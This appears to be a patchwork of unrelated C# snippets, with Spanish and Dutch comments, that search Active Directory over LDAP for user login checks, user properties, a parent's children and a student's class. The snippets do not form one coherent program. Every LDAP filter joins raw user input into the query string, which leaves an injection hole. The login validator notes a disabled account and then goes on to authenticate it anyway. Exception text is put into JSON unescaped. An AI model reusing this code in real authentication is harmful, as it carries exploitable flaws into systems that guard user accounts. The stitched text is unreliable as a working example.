}
SearchResult result = adSearch.FindOne();
if (result != null)
{
foreach (String property in requiredProperties)
{
if (result.GetDirectoryEntry().Properties[property].Value != null)
{
switch (property)
{
case "cn":
this._fullname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "userprincipalname":
this._userprincipalname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "physicaldeliveryofficename":
this._physicaldeliveryofficename = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "distinguishedname":
this._distinguishedname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "telephonenumber":
this._telephonenumber = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "department":
this._department = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "mail":
this._email = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "title":
this._title = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "adspath":
this._adspath = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
default:
break;
}
}
}
}
}
public string validarUsuario(string usuario, string clave, string dominio)
{
dominio = (dominio == "") ? "GRUPORANSA" : dominio;
string rpta = "";
AccesoUsuarioOutput usuarios = new AccesoUsuarioOutput();
DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
variablesGlobales._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
int flagExists = variablesGlobales._estCuentaUsuario & 0x2;
if (flagExists > 0)
{
usuarios.IDUSER = 0;
usuarios.USERNM = "La cuenta de usuario se encuentra deshabilitada";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
//rpta = "[{id=0, mensaje = '"+ ex.Message + "'}]";
rpta = "{\"id\":0, \"mensaje\": \"" + ex.Message + "\"}";
return(rpta);
}
if (User.Properties.Contains("displayName"))
{
variablesGlobales._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
}
variablesGlobales._rolUsuario = (User.Properties["title"].Count > 0) ? System.Convert.ToString(User.Properties["title"][0]) : "";
variablesGlobales._dptoUsuario = (User.Properties["department"].Count > 0) ? System.Convert.ToString(User.Properties["department"][0]) : "";
variablesGlobales._correoUsuario = (User.Properties["proxyAddresses"].Count > 0) ? System.Convert.ToString(User.Properties["proxyAddresses"][0]) : "";
variablesGlobales._cuentaUsuario = (User.Properties["sAMAccountName"].Count > 0) ? System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper() : "";
usuarios = ValidarAccesos(variablesGlobales._cuentaUsuario);
rpta = JsonConvert.SerializeObject(usuarios);
}
}
else
{
usuarios.IDUSER = 0;
usuarios.USERNM = "No EXiste";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
}
}
return(rpta);
}
private void GetPropertyFromAD(DataTable result)
{
string userName = this.Context.User.Identity.Name;
using (HostingEnvironment.Impersonate())
{
DirectoryEntry dirEntry = new DirectoryEntry(_adEntryPoint);
string studentName = "";
// Trim the domain name
if (userName.IndexOf("\\") != 0)
{
userName = userName.Substring(userName.LastIndexOf("\\") + 1);
}
// We are storing the Children of a Parent in the property of Active Directory specified
System.DirectoryServices.DirectorySearcher mySearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
mySearcher.PropertiesToLoad.Add(_adChildAttribute);
//Set the filter for the current user
mySearcher.Filter = "(&(objectCategory=user)(samaccountname=" + userName + "))";
ResultPropertyValueCollection myResultPropColl = null;
try
{
myResultPropColl = mySearcher.FindOne().Properties[_adChildAttribute];
}
catch (Exception ex)
{
Debug(ex.ToString());
ShowMessage(LoadResource(GenericErrMsg), String.Format(LoadResource("ErrorRetrievingChildren"), ex.ToString()));
return;
}
//if null an error occured
if (myResultPropColl == null)
{
ShowMessage(LoadResource(GenericErrMsg));
return;
}
//if count =0 then no childern
if (myResultPropColl.Count == 0)
{
ShowMessage(LoadResource("NoChild"));
}
// Loop through each found child, and return their Display Name , Image Url and First Name
foreach (object myCollection in myResultPropColl)
{
string orgStudentName = myCollection.ToString();
Debug("{0} in AD attribute", orgStudentName);
if (!IsMember(orgStudentName, _studentsSiteURL))
{
Debug("Not member");
continue;
}
DataRow studentRow = result.NewRow();
studentRow[IsSelectedColumnName] = false;
studentRow[UserNameColumnName] = orgStudentName;
// Trim the domain name
if (orgStudentName.IndexOf("\\") != 0)
{
studentName = orgStudentName.Substring(orgStudentName.LastIndexOf("\\") + 1);
}
try
{
//read display name property
mySearcher.PropertiesToLoad.Add(DisplayNameColumnName);
mySearcher.Filter = "(&(objectCategory=user)(samaccountname=" + studentName + "))";
System.DirectoryServices.SearchResult SrchRes;
SrchRes = mySearcher.FindOne();
if (SrchRes != null)
{
studentRow[DisplayNameColumnName] = SrchRes.Properties[DisplayNameColumnName][0].ToString();
string pictureURL = GetStudentImage(studentName);
if (pictureURL == null)
{
System.Uri defaultpic = new Uri(new Uri(Context.Request.Url.ToString()), DefaultPictureURL);
pictureURL = defaultpic.OriginalString.ToString();
}
studentRow[ImageUrlColumnName] = pictureURL;
result.Rows.Add(studentRow);
}
else // No user object found for the attached child
{
ShowMessage(String.Format(LoadResource("NoChildFound"), studentName));
}
}
catch (Exception ex)
{
ShowMessage(LoadResource(GenericErrMsg), String.Format(LoadResource("ErrorRetrievingChildInfo"), studentName, ex.Message));
}
}
mySearcher.Dispose();
}
}
/// <summary>
/// Create UserController with Default Items
/// </summary>
public UserManagementController()
{
_de = new DirectoryEntry(
ConfigurationManager.ConnectionStrings["ADConn"]
.ConnectionString);
_adSearch = new DirectorySearcher(_de);
}
private async Task<string> GetStudentClass(string studentnumber)
{
await Task.Delay(0);
try
{
using (DirectoryEntry dir = new DirectoryEntry(LDAP_URL)) //Instantiate dir entry and pass the domain
{
dir.Username = USERNAME;
dir.Password = PASSWORD;
using (DirectorySearcher search = new DirectorySearcher(dir)) //Search query instance
{
search.Filter = "(&(objectClass=user)(pager=" + studentnumber + "))"; //Filter by pager (Student number)
search.PropertiesToLoad.Add("telephoneNumber"); //Allows us to use the "pager" property to search by student ID
SearchResult searchresult = search.FindOne();
using (DirectoryEntry uEntry = searchresult.GetDirectoryEntry())
{
string leerlingnaam = uEntry.Properties["givenName"].Value.ToString() + " " + uEntry.Properties["sn"].Value.ToString(); //Store full student name in string
string LDAPDescription = uEntry.Properties["memberOf"][1].ToString();
//Clean it up to only return the students class id
return LDAPDescription.Substring(LDAPDescription.IndexOf('=') + 1, LDAPDescription.IndexOf(',') - 3) + "@" + leerlingnaam;
}
}
}
}
catch
{
return "";
}
}
